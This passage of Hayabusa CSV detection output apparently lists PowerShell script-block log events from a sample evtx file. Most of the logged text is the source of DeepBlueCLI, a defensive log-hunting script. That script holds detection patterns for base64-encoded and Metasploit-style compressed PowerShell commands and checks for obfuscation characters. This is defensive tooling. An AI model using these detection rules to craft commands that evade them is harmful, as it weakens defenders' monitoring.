variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:24:04.587 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:39.074 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.257 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" 
$filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return 